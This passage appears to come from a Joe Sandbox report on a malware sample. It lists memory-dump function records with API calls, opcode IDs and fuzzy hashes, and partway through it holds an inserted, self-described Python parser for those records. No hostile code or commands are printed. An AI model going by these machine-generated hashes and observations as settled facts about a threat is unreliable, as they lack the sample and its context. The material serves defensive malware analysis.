                                                        • Instruction Fuzzy Hash: B52125B1C0025ACFDB14CFA9D884BEEBBF4EF49310F14845AE455A7250D7389945CFA5
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 098AAE6F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: b34d2a149d31724ea988f1ec85b5799a8c9e02a16540953757dc92e95ac9d1f7
                                                        • Instruction ID: 2615557c92e459d7ce83648eb1e1b4fc5304aa753de420405d006cc939f450e4
                                                        • Opcode Fuzzy Hash: b34d2a149d31724ea988f1ec85b5799a8c9e02a16540953757dc92e95ac9d1f7
                                                        • Instruction Fuzzy Hash: 3F21C4B59002499FDB10CF9AD984ADEBBF9EB48310F14841AE914A7350D378A954CFA5
                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 098AAE6F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 1fa54f8cfb7b1a397414fd42f5ba745dd8cf8572c845afd87b3768e434af1586
                                                        • Instruction ID: 95ae8b8e8ee6db17d2830833e44daf8e31e2b3434def01d8dc903066a6bb24bd
                                                        • Opcode Fuzzy Hash: 1fa54f8cfb7b1a397414fd42f5ba745dd8cf8572c845afd87b3768e434af1586
                                                        • Instruction Fuzzy Hash: 9C2103B5D00209DFDB00CFA9D984ADEBBF5EF48310F24801AE918A3350D338A950CFA4
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 097287A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: c0da8686319829575436cd86605fb3d0e3917fca72ed14a8152019417748532a
                                                        • Instruction ID: f6f11400010644451e0b5f12c096194707af00054668ee02b716c96e5bade4e6
                                                        • Opcode Fuzzy Hash: c0da8686319829575436cd86605fb3d0e3917fca72ed14a8152019417748532a
                                                        • Instruction Fuzzy Hash: B51136B2C0062A9BDB10CF9AD4447DEFBB4EF48720F14812AD818A7340D338A950CFA5
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,098A8AC1,00000800,00000000,00000000), ref: 098A8CD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 67135cacbd8b675771b781f5e3011ccf392042bda7556d69cda51f6b0d7df6c0
                                                        • Instruction ID: 6834848fb17a2098bbc4dde301abb5331b64df885d187e04a5e774fbace0cf6b
                                                        • Opcode Fuzzy Hash: 67135cacbd8b675771b781f5e3011ccf392042bda7556d69cda51f6b0d7df6c0
                                                        • Instruction Fuzzy Hash: 4C1103B6C002099FDB10CF9AD444A9EFBF4EB88310F14842EE519A7300C779A945CFA4
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,098A8AC1,00000800,00000000,00000000), ref: 098A8CD2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: cb5b264a7281f74f656a0f7e38b77dd4a2ed3118736184e971975abcd4e5d64e
                                                        • Instruction ID: 360ff3030f88eb7015101c1fc5d8c0c7c6e5d29d01075b0e36999ab14ad71524
                                                        • Opcode Fuzzy Hash: cb5b264a7281f74f656a0f7e38b77dd4a2ed3118736184e971975abcd4e5d64e
                                                        • Instruction Fuzzy Hash: D511FFB6C002098FEB10CF9AD444A9EBBF4BB58210F14842AD919A7200C379AA45CFA4
                                                        APIs
                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 0512C2A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: DebugOutputString
                                                        • String ID:
                                                        • API String ID: 1166629820-0
                                                        • Opcode ID: 46880d96591a7bbdf82104e5c925ef8dda9c728caf10fa395d9ba4e83fee8219
                                                        • Instruction ID: 720f8c85ebf778e6723b5fc11f4b0996f42b70704e8c604fe46157a85b7f2014
                                                        • Opcode Fuzzy Hash: 46880d96591a7bbdf82104e5c925ef8dda9c728caf10fa395d9ba4e83fee8219
                                                        • Instruction Fuzzy Hash: 601123B1C0065A9BDB14CF9AD544B9EFBB4FB48724F10811AD918B3240C738A950CFE5
                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 0B2F8095
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 2a7577872d91269b311e66ced528ce624d01219492de62af441acc2dc940ea36
                                                        • Instruction ID: 6a71ff89c1165e1dc2880cd2bec0267db76bf0d123c6eeb190162824480e4e89
                                                        • Opcode Fuzzy Hash: 2a7577872d91269b311e66ced528ce624d01219492de62af441acc2dc940ea36
                                                        • Instruction Fuzzy Hash: 6011E0B580034ADFDB10CF9AD885BDEFBF8EB48724F208459E558A7250C375A944CFA5
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 098A8A46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 3c36df3f86abc7b34ded31f483136cece92b1b504d4dbb22823be8e9c1b000e1
                                                        • Instruction ID: 48746bf5d2ffe1e5e9d7627edfa30258c560e981ff5e423e395a9a77df3d06ab
                                                        • Opcode Fuzzy Hash: 3c36df3f86abc7b34ded31f483136cece92b1b504d4dbb22823be8e9c1b000e1
                                                        • Instruction Fuzzy Hash: C811E0B5C0064A8FDB10CF9AD444ADEFBF4AB88224F10841AD929B7310D379A545CFA5
                                                        APIs
                                                        • PostMessageW.USER32(?,?,?,?), ref: 0B2F8095
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 235a2954504a4c87e77ecb4939f73aeefd3abb967d1947894204ec854053c637
                                                        • Instruction ID: cb75638a9154d1c28e916464bc666ff7ed17175eb19bbdddf853bb401cdf8259
                                                        • Opcode Fuzzy Hash: 235a2954504a4c87e77ecb4939f73aeefd3abb967d1947894204ec854053c637
                                                        • Instruction Fuzzy Hash: F711E5B580034ADFDB10CF9AD885BDEFBF8EB48324F208459D558A7250C375A944CFA5
                                                        APIs
                                                        • OutputDebugStringW.KERNELBASE(00000000), ref: 0512C2A0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: DebugOutputString
                                                        • String ID:
                                                        • API String ID: 1166629820-0
                                                        • Opcode ID: 20ef1c9bac1d365ed1f4aca10265c4641b13b7af5ff867279102288de1731959
                                                        • Instruction ID: 53270bb8badb3d75dedc2664dba70306152ae664f2bb333e76b5e0212eab3f39
                                                        • Opcode Fuzzy Hash: 20ef1c9bac1d365ed1f4aca10265c4641b13b7af5ff867279102288de1731959
                                                        • Instruction Fuzzy Hash: A1F0F0B2C082A5EEDB118B9AD8043DDFBB0FB48318F04818AD658A7251C7785525CFE1
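The function records above are raw Joe Sandbox IDA Plugin output. The Python below is an added example, not part of the Joe Sandbox report: it parses records of this shape into structured data (the three sample records are copied verbatim from this section) and runs the checks a reviewer would want before citing one of them: that each API call's ref address lies inside the dumped region, that the Offset field agrees with the base address encoded in the .sdmp name, whether the region is RWX memory not backed by a PE on disk, and which APIs the dumped code reaches (here OutputDebugStringW, the call behind the "extensive OutputDebugStringW loop" signature, and PostMessageW). Reading the fifth dotted field of the .sdmp filename as the region's page protection is an assumption about the naming scheme, not documented behaviour.

```python
import re
from collections import Counter

# Constructed sample: three records copied from this section of the report.
SAMPLE = """\
APIs
• OutputDebugStringW.KERNELBASE(00000000), ref: 0512C2A0
Memory Dump Source
• Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5120000_image.jbxd
Similarity
• API ID: DebugOutputString
• String ID:
• API String ID: 1166629820-0
• Opcode ID: 20ef1c9bac1d365ed1f4aca10265c4641b13b7af5ff867279102288de1731959
• Instruction ID: 53270bb8badb3d75dedc2664dba70306152ae664f2bb333e76b5e0212eab3f39
• Opcode Fuzzy Hash: 20ef1c9bac1d365ed1f4aca10265c4641b13b7af5ff867279102288de1731959
• Instruction Fuzzy Hash: A1F0F0B2C082A5EEDB118B9AD8043DDFBB0FB48318F04818AD658A7251C7785525CFE1
APIs
• PostMessageW.USER32(?,?,?,?), ref: 0B2F8095
Memory Dump Source
• Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: 235a2954504a4c87e77ecb4939f73aeefd3abb967d1947894204ec854053c637
• Instruction ID: cb75638a9154d1c28e916464bc666ff7ed17175eb19bbdddf853bb401cdf8259
• Opcode Fuzzy Hash: 235a2954504a4c87e77ecb4939f73aeefd3abb967d1947894204ec854053c637
• Instruction Fuzzy Hash: F711E5B580034ADFDB10CF9AD885BDEFBF8EB48324F208459D558A7250C375A944CFA5
Memory Dump Source
• Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9af0000_image.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 834e5a0a78d45021735cdf223cf815b6ee5328cf68f3e94f2f91f129f1be44a8
• Instruction ID: ce1e6e639e2a9fb34af4bcb66daa92117b918980b00aebb698c7f6d1e0aea1ec
• Opcode Fuzzy Hash: 834e5a0a78d45021735cdf223cf815b6ee5328cf68f3e94f2f91f129f1be44a8
• Instruction Fuzzy Hash: F4121530B093818FC705BBB9E8A562EBFF2FF81600F55446AD085D7391DE388849C7A2
"""

HEADERS = ("APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")
API_RE = re.compile(r"^(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")
PAGE_EXECUTE_READWRITE = 0x40  # Win32 constant; mapping it to the 5th filename field is an assumption


def parse_records(text):
    """Split report text into one dict per IDA-plugin function record."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADERS:
            # A record opens at "APIs", or at "Memory Dump Source" when no
            # "APIs" header has already opened one for it.
            if line == "APIs" or (line == "Memory Dump Source" and (cur is None or "file" in cur)):
                cur = {"apis": [], "similarity": {}}
                records.append(cur)
            section = line
            continue
        item = line.lstrip("• ").strip()
        if section == "APIs" and (m := API_RE.match(item)):
            cur["apis"].append({"func": m["func"], "module": m["module"],
                                "args": m["args"].split(",") if m["args"] else [],
                                "ref": int(m["ref"], 16)})
        elif section == "Memory Dump Source" and (m := SRC_RE.match(item)):
            fields = m["file"].split(".")
            cur.update(file=m["file"], offset=int(m["off"], 16),
                       base=int(fields[3], 16),      # base address encoded in the filename
                       protect=int(fields[4], 16),   # assumed: page protection of the region
                       based_on_pe=(m["pe"] == "true"))
        elif section == "Joe Sandbox IDA Plugin":
            cur["snapshot"] = item.partition(":")[2].strip()
        elif section == "Similarity":
            key, _, value = item.partition(":")
            cur["similarity"][key.strip()] = value.strip()
    return records


def check_record(rec):
    """Consistency and context checks on one record; returns human-readable findings."""
    findings = []
    if rec["offset"] != rec["base"]:
        findings.append("offset field disagrees with filename base")
    if rec["protect"] == PAGE_EXECUTE_READWRITE and not rec["based_on_pe"]:
        findings.append("RWX region not backed by a PE on disk")
    if rec["similarity"].get("Opcode ID") != rec["similarity"].get("Opcode Fuzzy Hash"):
        findings.append("opcode id and opcode fuzzy hash differ")
    for api in rec["apis"]:
        if api["ref"] < rec["base"]:
            findings.append(f"{api['func']} ref {api['ref']:08X} lies below dump base")
        else:
            findings.append(f"{api['func']} at base+{api['ref'] - rec['base']:X}")
    return findings


def summarize(records):
    """Which APIs the dumped code reaches and how many records each region holds."""
    return {"records": len(records),
            "apis": dict(Counter(a["func"] for r in records for a in r["apis"])),
            "regions": dict(Counter(f"{r['base']:08X}" for r in records))}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(f"{r['base']:08X} {r['similarity'].get('API ID') or '-':18} {'; '.join(check_record(r))}")
    print(summarize(recs))
```

Run it over a whole report export (feed the full text to parse_records) to see at a glance which dumped regions contain API-calling code and which regions only carry hash records; on this section every record comes from a non-PE dump, so none of these functions can be matched to a module on disk by name alone.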
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 834e5a0a78d45021735cdf223cf815b6ee5328cf68f3e94f2f91f129f1be44a8
                                                        • Instruction ID: ce1e6e639e2a9fb34af4bcb66daa92117b918980b00aebb698c7f6d1e0aea1ec
                                                        • Opcode Fuzzy Hash: 834e5a0a78d45021735cdf223cf815b6ee5328cf68f3e94f2f91f129f1be44a8
                                                        • Instruction Fuzzy Hash: F4121530B093818FC705BBB9E8A562EBFF2FF81600F55446AD085D7391DE388849C7A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a6873de4f1644757458a113e9bafbcacbd5eec76a310d616c5659d3ebeb8150
                                                        • Instruction ID: 191c8ffef2e702d42663e66a05859a26aeab517aa312d57afb813695bf5bb0f8
                                                        • Opcode Fuzzy Hash: 5a6873de4f1644757458a113e9bafbcacbd5eec76a310d616c5659d3ebeb8150
                                                        • Instruction Fuzzy Hash: 00E15770A11244CFC709FFB9EA9866DBBF1FB88600F5049A9D485AB394EE349C05C792
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c4e701be9912716d0beb82c11d79285496ffcc01e608343c4b687a04ffddc48
                                                        • Instruction ID: 4c1ce259cdaa450cb2cb3e8102ef315a96bc65f9b44b0046b608631a3743ce3e
                                                        • Opcode Fuzzy Hash: 3c4e701be9912716d0beb82c11d79285496ffcc01e608343c4b687a04ffddc48
                                                        • Instruction Fuzzy Hash: DD02BE70A15294CFCB04BFB9D99862DBBF1FF89600F4145A9D486EB391DB389C06CB52
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc5f67da5ee6957339f19eb14920e93c715c6ad290a162ad465738e0ccca59b4
                                                        • Instruction ID: 62e370fdc01d11883f3bf5aca61151a0d219ab47d58f0cf3bb1c66e164c3d7ef
                                                        • Opcode Fuzzy Hash: cc5f67da5ee6957339f19eb14920e93c715c6ad290a162ad465738e0ccca59b4
                                                        • Instruction Fuzzy Hash: 10123D74B04218CFDB2C9B69C95476EB7B2FBC4300F2044A9E50AAB399EF359D81CB55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48a77c1902c95c0d75f79eff5dacc8de03f3187d9675601492345a87a0fc3135
                                                        • Instruction ID: 184c3836a984097071f672a53de193d0c8c540004002bbd8d559470bab755309
                                                        • Opcode Fuzzy Hash: 48a77c1902c95c0d75f79eff5dacc8de03f3187d9675601492345a87a0fc3135
                                                        • Instruction Fuzzy Hash: 8C021331B052818FC705FFB9DA9862E7BF2FF85604F4445A9D485EB391DA349C06C7A2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 61e668205ba508f6b1d8dce5d882ade0b068f50eeb685f7004f4cb28b73ed971
                                                        • Instruction ID: fb98304596ef1ddec8f8d12872eac94ab599fa235d7e588f2d0a3433e1d866c8
                                                        • Opcode Fuzzy Hash: 61e668205ba508f6b1d8dce5d882ade0b068f50eeb685f7004f4cb28b73ed971
                                                        • Instruction Fuzzy Hash: 02028B31E04254CFCB04AFB8E8A96ADBBB2BB88741F504969E849D7350EF348D56CF51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8e6f78988b4f22d5061f198d4ed751fb7e1bd425836ccff25bb38b39df305ddf
                                                        • Instruction ID: 76a1740dcc0a007ba0608d77f1168040aa48c19fc1dd167a3976be0ecc63c084
                                                        • Opcode Fuzzy Hash: 8e6f78988b4f22d5061f198d4ed751fb7e1bd425836ccff25bb38b39df305ddf
                                                        • Instruction Fuzzy Hash: 30F14870A11254CFCB08BFB9D99866EBBB2FF88B00F404969D446E7354DE389C56CB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: af9b9eab8545d5c88650666b98808b467cfce0e04fd7cc213278f9c4b41eb5f0
                                                        • Instruction ID: 044bf55d07a4751866edff8b18082d9eba8e6da74a15a17d11c72ff0019a47c1
                                                        • Opcode Fuzzy Hash: af9b9eab8545d5c88650666b98808b467cfce0e04fd7cc213278f9c4b41eb5f0
                                                        • Instruction Fuzzy Hash: 88E170316162418BC308BFB9EA9862EBBE1FBC8B40F81496DE489D7354EE34DC55C752
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01a41df0903d403707bf2f1ce8871a8592250a4df97fd0c5402bf4c446bf8ccc
                                                        • Instruction ID: e71fae702964cc0df2996fc6e90e9b7ea87d39d0543c5389cd5f4e4afc7b0247
                                                        • Opcode Fuzzy Hash: 01a41df0903d403707bf2f1ce8871a8592250a4df97fd0c5402bf4c446bf8ccc
                                                        • Instruction Fuzzy Hash: BAE15830A11244CFC708FBB9EA9866DBBF1FB88700F5049A9D485AB394EF359C15C792
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf3e6c1d169af33856dc771be9da9039ec6833d8a19f7cd631078f73442519fb
                                                        • Instruction ID: 37e66c117ad7601f0ecb388f75a0d96815c3da95c5aad921b4befb22e33aa59d
                                                        • Opcode Fuzzy Hash: cf3e6c1d169af33856dc771be9da9039ec6833d8a19f7cd631078f73442519fb
                                                        • Instruction Fuzzy Hash: 83E1C230B002149FDB099F68C898B7E7BA6AFC8745F148829E506CB399DF74CD46CB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a53519782eef229736d377ca2e17415bf7b61c0e6e99560e0f8387eb9a3c1192
                                                        • Instruction ID: d2a9eca177430a99e074a1b037871be1e706317bd732e72957df2c3b9920e2e7
                                                        • Opcode Fuzzy Hash: a53519782eef229736d377ca2e17415bf7b61c0e6e99560e0f8387eb9a3c1192
                                                        • Instruction Fuzzy Hash: 39E19B31A11245CBCB08BFB9ED986ADBBF2FF84600F458529E448E7354EE349C56C791
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2340426f65156dedad044b1911975a6a9b3ecb2334126b7cd2a7281c79054583
                                                        • Instruction ID: 98ea2e9d6f655c818516e848b193a5a0222de01f8bdf11a6ce76533394fcb29a
                                                        • Opcode Fuzzy Hash: 2340426f65156dedad044b1911975a6a9b3ecb2334126b7cd2a7281c79054583
                                                        • Instruction Fuzzy Hash: D5D18B31B11211CFC708BFB9EA9963EBBB2FB88B05F444968E446D7744DE389845CB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbf60a70737787d93045a084071654d6fec8e7f977853985cbea6c51ab1602a4
                                                        • Instruction ID: 46f4e7c010b3837619a0621176cb2da8ac94fd830b56f3b18fcc26b4fa745b56
                                                        • Opcode Fuzzy Hash: fbf60a70737787d93045a084071654d6fec8e7f977853985cbea6c51ab1602a4
                                                        • Instruction Fuzzy Hash: 16E1FC71A00519CFCB09DFACC98899DBBF6FF89314B1A8459E515AB366CB70EC41CB50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f127148a3fbd176a4adf33a394339e2fd486bb34b6050b441638a93954cea5f5
                                                        • Instruction ID: ac661340e380dff3df668e6cfd868b153f74ea83ca9efd61cfa0590f89945cb4
                                                        • Opcode Fuzzy Hash: f127148a3fbd176a4adf33a394339e2fd486bb34b6050b441638a93954cea5f5
                                                        • Instruction Fuzzy Hash: 5AC17C71A112448FC708FFB9EA9866EBBF2FF88600F514469D484E7754EE349C15CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be133db1c2b725844ea1f6277e5282725d4fd24b3e4a89b502d159c19239e015
                                                        • Instruction ID: 95be310eba52713d2a15c6bdf1e5240b3883d74ef5a6459271ecf72d0f6b9b7e
                                                        • Opcode Fuzzy Hash: be133db1c2b725844ea1f6277e5282725d4fd24b3e4a89b502d159c19239e015
                                                        • Instruction Fuzzy Hash: 2BB18B31A112448FC708FFB9DA9866EBBF2FF88A00F514469D445E7750EE389C55CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf320095ce145a343d39dcc0489a625d5efc0b55a4e6742d595724e93ae2bc93
                                                        • Instruction ID: 79c5a8f583fe8cb29c5c4580a0f0fd92ad182a1bd068935bd39e24535771a30e
                                                        • Opcode Fuzzy Hash: bf320095ce145a343d39dcc0489a625d5efc0b55a4e6742d595724e93ae2bc93
                                                        • Instruction Fuzzy Hash: 7CA1A234F00158DFEB2C9AA9D854B6E76A6FBC8700F254429E5079B78DDB34CC82C796
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4d01ee728319473a1e59f71743130172b4e23cf0be337f67bce0451b0c47ee31
                                                        • Instruction ID: 65c66e9fe55a2d674740a361c033f7b8d6407199bbdda8064e71152677cbbb94
                                                        • Opcode Fuzzy Hash: 4d01ee728319473a1e59f71743130172b4e23cf0be337f67bce0451b0c47ee31
                                                        • Instruction Fuzzy Hash: 5281BE31B156858FD708BBBEE99862EBBF2FF84610F44486DD085D7750EE389819C362
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
